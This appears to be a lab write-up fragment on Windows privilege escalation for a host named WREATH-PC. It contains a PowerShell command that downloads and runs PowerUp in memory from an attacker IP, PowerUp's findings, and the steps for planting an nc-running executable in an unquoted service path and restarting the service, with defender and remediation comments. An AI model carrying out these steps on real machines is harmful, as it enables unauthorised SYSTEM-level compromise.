Privilege Escalation
rem Fetches PowerUp.ps1 over plain HTTP from 10.50.102.164, evaluates it in memory with IEX,
rem and runs every PowerUp check; the output below is the result.
rem Defender view: the script body never touches disk, so file-based scanning will not see it.
rem PowerShell script block logging (event ID 4104) and AMSI still receive the downloaded text,
rem and the outbound HTTP request from powershell.exe is visible to proxy and EDR network telemetry.
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.50.102.164/PowerUp.ps1');Invoke-Allchecks"
Privilege : SeImpersonatePrivilege
Attributes : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
TokenHandle : 2112
ProcessId : 788
Name : 788
Check : Process Token Privileges
ServiceName : SystemExplorerHelpService
Path : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path <HijackPath>
CanRestart : True
Name : SystemExplorerHelpService
Check : Unquoted Service Paths
ServiceName : SystemExplorerHelpService
Path : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path <HijackPath>
CanRestart : True
Name : SystemExplorerHelpService
Check : Unquoted Service Paths
ServiceName : SystemExplorerHelpService
Path : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\System Explorer; IdentityReference=BUILTIN\Users;
Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path <HijackPath>
CanRestart : True
Name : SystemExplorerHelpService
Check : Unquoted Service Paths
ServiceName : SystemExplorerHelpService
Path : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\System Explorer\System
Explorer\service\SystemExplorerService64.exe; IdentityReference=BUILTIN\Users;
Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path <HijackPath>
CanRestart : True
Name : SystemExplorerHelpService
Check : Unquoted Service Paths
ServiceName : SystemExplorerHelpService
Path : C:\Program Files (x86)\System Explorer\System
Explorer\service\SystemExplorerService64.exe
ModifiableFile : C:\Program Files (x86)\System Explorer\System
Explorer\service\SystemExplorerService64.exe
ModifiableFilePermissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'SystemExplorerHelpService'
CanRestart : True
Name : SystemExplorerHelpService
Check : Modifiable Service Files
ModifiablePath : C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps
IdentityReference : WREATH-PC\Thomas
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps
Name : C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
Key : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Path : "C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe" /TRAY
ModifiableFile : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
Name : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Check : Modifiable Registry Autorun
Key : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Path : "C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe" /TRAY
ModifiableFile : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
Name : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Check : Modifiable Registry Autorun
Key : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Path : "C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe" /TRAY
ModifiableFile : @{ModifiablePath=C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe;
IdentityReference=BUILTIN\Users; Permissions=System.Object[]}
Name : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Check : Modifiable Registry Autorun
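Compiled a malicious executable (System.exe) that runs nc, copied it into the writable directory on the unquoted service path, and restarted the service: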
rem The service Path reported by PowerUp above is unquoted and contains spaces, so Windows tries
rem "C:\Program Files (x86)\System Explorer\System.exe" before it reaches the real service binary.
rem PowerUp also reports that BUILTIN\Users can write to that directory and that the service runs as LocalSystem.
copy C:\Users\Thomas\Documents\System.exe "C:\Program Files (x86)\System Explorer\"
rem CanRestart is True for this user, so a stop/start makes the service manager resolve the path again.
sc stop SystemExplorerHelpService
sc start SystemExplorerHelpService
rem Remediation: wrap the service's binary path in quotes and remove BUILTIN\Users write access
rem from the install directory tree and from the service executable itself.
rem Detection: watch for new executables created in parent directories of a service binary,
rem and for service stop/start requests issued by a non-administrative account.